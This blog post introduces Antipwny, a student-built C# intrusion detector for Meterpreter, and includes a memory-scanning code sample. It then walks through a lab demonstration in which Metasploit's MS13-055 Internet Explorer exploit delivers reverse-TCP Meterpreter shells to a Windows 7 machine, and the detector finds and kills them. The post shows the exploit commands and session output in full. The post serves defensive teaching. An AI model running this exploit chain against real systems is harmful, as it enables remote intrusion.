Antipwny, by Rohan Vazarkar and David Bitner
In Summer and Fall of 2013, my students Rohan Vazarkar and David Bitner began developing Antipwny, a host-based intrusion detection system customized to detect Meterpreter payloads and other Metasploit artifacts.
The latest version of the tool is available on GitHub. It is written in C#, and requires a full .NET Framework 4.5 installation.
Right now (November 2013) it is functional but incomplete. It happily detects Meterpreter and Metasploit in running memory, and it has a GUI, though the GUI is not yet finished.
To see the tool in action, let’s target a Windows 7 SP1 x64 system. Grab a copy of Antipwny from GitHub along with the .NET installer. The installation of .NET is standard. Once that is done, simply uncompress the Antipwny archive in a convenient directory and run the tool located in the exe subdirectory; separate versions exist for 32- and 64-bit architectures. Once it is running, you obtain a simple GUI:
The program runs in the background, periodically scanning memory for evidence of Meterpreter or Metasploit.
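As an added illustration of what "scanning memory" involves (this is not Antipwny's own code), the class below walks every committed, readable region of a process with VirtualQueryEx and ReadProcessMemory and searches it for a byte pattern; the pattern a caller passes, such as the ASCII name of Meterpreter's core library "metsrv", is an assumed illustrative signature, not a rule taken from the tool.

```csharp
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
// Illustration only, not Antipwny's code: walk a process's committed memory with
// VirtualQueryEx/ReadProcessMemory and search it for a byte pattern.
static class MemoryScanner {
    [StructLayout(LayoutKind.Sequential)] struct MEMORY_BASIC_INFORMATION {
        public IntPtr BaseAddress, AllocationBase; public uint AllocationProtect;
        public IntPtr RegionSize; public uint State, Protect, Type;
    }
    const uint PROCESS_QUERY_INFORMATION = 0x0400, PROCESS_VM_READ = 0x0010;
    const uint MEM_COMMIT = 0x1000, PAGE_NOACCESS = 0x01, PAGE_GUARD = 0x100;
    [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll")] static extern IntPtr VirtualQueryEx(IntPtr h, IntPtr addr, out MEMORY_BASIC_INFORMATION mbi, IntPtr len);
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool ReadProcessMemory(IntPtr h, IntPtr addr, byte[] buf, IntPtr size, out IntPtr read);
    [DllImport("kernel32.dll")] static extern bool CloseHandle(IntPtr h);

    // long -> IntPtr without the range check a 32-bit build would trip at the 2 GB boundary.
    static IntPtr Ptr(long v) { return IntPtr.Size == 4 ? new IntPtr(unchecked((int)v)) : new IntPtr(v); }

    // True if any committed, readable region holds the pattern. A 32-bit build cannot see above 4 GB of a 64-bit target.
    public static bool ProcessContains(Process p, byte[] pattern) {
        IntPtr h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, p.Id);
        if (h == IntPtr.Zero) return false;                       // access denied (e.g. protected process)
        try {
            long addr = 0; MEMORY_BASIC_INFORMATION mbi;
            IntPtr mbiSize = (IntPtr)Marshal.SizeOf(typeof(MEMORY_BASIC_INFORMATION));
            while (VirtualQueryEx(h, Ptr(addr), out mbi, mbiSize) != IntPtr.Zero) {
                long size = mbi.RegionSize.ToInt64();
                bool readable = mbi.State == MEM_COMMIT && (mbi.Protect & (PAGE_NOACCESS | PAGE_GUARD)) == 0;
                if (readable && size <= int.MaxValue) {
                    byte[] buf = new byte[size]; IntPtr read;
                    if (ReadProcessMemory(h, mbi.BaseAddress, buf, (IntPtr)buf.Length, out read)
                        && Contains(buf, (int)read.ToInt64(), pattern)) return true;
                }
                addr = mbi.BaseAddress.ToInt64() + size;                                // next region
                if (addr <= 0 || (IntPtr.Size == 4 && addr > uint.MaxValue)) break;   // ran off the end of user space
            }
        } finally { CloseHandle(h); }
        return false;
    }

    static bool Contains(byte[] hay, int len, byte[] needle) {      // naive search over the bytes actually read
        for (int i = 0, j; i + needle.Length <= len; i++) {
            for (j = 0; j < needle.Length && hay[i + j] == needle[j]; j++) { }
            if (j == needle.Length) return true;
        }
        return false;
    }
}
```

To mimic Antipwny's periodic scan, call ProcessContains on each entry of Process.GetProcesses() from a timer, skipping the scanner's own PID (its pattern buffer would match itself), and report the hits.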
Speaking of which, we need to start thinking about an attack. For the exploit, we’ll use the MS13_055 CAnchor attack against Internet Explorer. This is a relatively recent Metasploit module (it dates to September 2013) which I have found to be quite reliable. Let’s get things started in Kali:
       =[ metasploit v4.8.0-2013111301 [core:4.8 api:1.0]
+ -- --=[ 1218 exploits - 664 auxiliary - 189 post
+ -- --=[ 322 payloads - 30 encoders - 8 nops

msf > use exploit/windows/browser/ms13_055_canchor
msf exploit(ms13_055_canchor) > set srvport 80
srvport => 80
msf exploit(ms13_055_canchor) > set uripath /
uripath => /
msf exploit(ms13_055_canchor) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_055_canchor) > set lhost 10.0.2.129
lhost => 10.0.2.129
msf exploit(ms13_055_canchor) > exploit
[*] Exploit running as background job.
msf exploit(ms13_055_canchor) > [*] Started reverse handler on 10.0.2.129:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.0.2.129:80/
[*] Server started.
Go ahead and visit the problematic web page with Internet Explorer. In Kali, we see the result of the exploit:
[*] 10.0.2.132 ms13_055_canchor - Using JRE ROP
[*] 10.0.2.132 ms13_055_canchor - Sending exploit...
[*] Sending stage (768512 bytes) to 10.0.2.132
[*] Meterpreter session 1 opened (10.0.2.129:4444 -> 10.0.2.132:49161) at 2013-11-17 19:54:38 -0500
[*] Session ID 1 (10.0.2.129:4444 -> 10.0.2.132:49161) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1036)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 604
[*] 10.0.2.132 ms13_055_canchor - Using JRE ROP
[*] 10.0.2.132 ms13_055_canchor - Sending exploit...
[*] Sending stage (768512 bytes) to 10.0.2.132
[+] Successfully migrated to process
[*] Meterpreter session 2 opened (10.0.2.129:4444 -> 10.0.2.132:49163) at 2013-11-17 19:54:45 -0500
[*] Session ID 2 (10.0.2.129:4444 -> 10.0.2.132:49163) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2788
[+] Successfully migrated to process

msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7SP1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
Interestingly, when Internet Explorer realized that it could not load the web page when it first visited the Kali system, it happily reloaded the web page, so we ended up with two shells instead of one. Woot!
The scan runs every minute (it can also be triggered on demand via the Rescan button); when it completes, you end up with information about the attack:
We see that Antipwny has detected both shells.
If you right-click on each of the noted Meterpreter sessions, you have the option to kill the process. If you do so, the attacker on Kali discovers:
meterpreter >
[*] 10.0.2.132 - Meterpreter session 2 closed. Reason: Died
[*] 10.0.2.132 - Meterpreter session 1 closed. Reason: Died
You can see a much more extensive demonstration of their tool from their conference presentation at B-Sides Delaware in November 2013: